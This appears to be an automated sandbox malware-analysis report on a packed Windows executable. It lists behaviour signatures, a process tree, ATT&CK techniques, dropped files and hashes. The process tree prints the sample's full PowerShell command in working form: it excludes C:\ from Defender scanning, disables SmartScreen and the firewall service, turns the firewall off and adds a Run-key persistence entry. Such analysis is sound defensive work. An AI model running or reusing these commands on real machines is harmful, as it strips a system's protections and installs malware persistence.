Analysis

  • max time kernel
    299s
  • max time network
    180s
  • platform
    windows10-1703_x64
  • resource
    win10-20220718-en
  • resource tags

    arch:x64arch:x86image:win10-20220718-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02-08-2022 22:17

General

  • Target

    41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe

  • Size

    3.4MB

  • MD5

    55a6d22be09d762103ae315f97b58561

  • SHA1

    f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1

  • SHA256

    41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a

  • SHA512

    4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820

Malware Config

Signatures

  • Modifies security service 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 52 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe
    "C:\Users\Admin\AppData\Local\Temp\41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Drops startup file
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3424
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      2⤵
      • Modifies security service
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3676
      • C:\ProgramData\UpSys.exe
        "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2492
        • C:\ProgramData\UpSys.exe
          "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1376
          • C:\ProgramData\UpSys.exe
            "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
            5⤵
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            • Suspicious use of WriteProcessMemory
            PID:228
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
              6⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2308
      • C:\Windows\system32\netsh.exe
        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:780

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Modify Existing Service

2
T1031

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

2
T1112

Virtualization/Sandbox Evasion

1
T1497

Discovery

Query Registry

2
T1012

Virtualization/Sandbox Evasion

1
T1497

System Information Discovery

3
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\MicrosoftNetwork\System.exe
    Filesize

    3.4MB

    MD5

    55a6d22be09d762103ae315f97b58561

    SHA1

    f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1

    SHA256

    41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a

    SHA512

    4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • memory/780-165-0x0000000000000000-mapping.dmp
  • memory/2308-216-0x0000013075F00000-0x0000013075F3C000-memory.dmp
    Filesize

    240KB

  • memory/2308-168-0x0000000000000000-mapping.dmp
  • memory/2492-159-0x0000000000000000-mapping.dmp
  • memory/3424-120-0x00007FF6EEBE0000-0x00007FF6EF538000-memory.dmp
    Filesize

    9.3MB

  • memory/3424-121-0x00007FFE63A30000-0x00007FFE63C0B000-memory.dmp
    Filesize

    1.9MB

  • memory/3424-119-0x00007FF6EEBE0000-0x00007FF6EF538000-memory.dmp
    Filesize

    9.3MB

  • memory/3424-117-0x00007FF6EEBE0000-0x00007FF6EF538000-memory.dmp
    Filesize

    9.3MB

  • memory/3424-118-0x00007FF6EEBE0000-0x00007FF6EF538000-memory.dmp
    Filesize

    9.3MB

  • memory/3424-234-0x00007FF6EEBE0000-0x00007FF6EF538000-memory.dmp
    Filesize

    9.3MB

  • memory/3424-235-0x00007FFE63A30000-0x00007FFE63C0B000-memory.dmp
    Filesize

    1.9MB

  • memory/3676-131-0x00000259A8C20000-0x00000259A8C96000-memory.dmp
    Filesize

    472KB

  • memory/3676-128-0x000002598FD20000-0x000002598FD42000-memory.dmp
    Filesize

    136KB

  • memory/3676-122-0x0000000000000000-mapping.dmp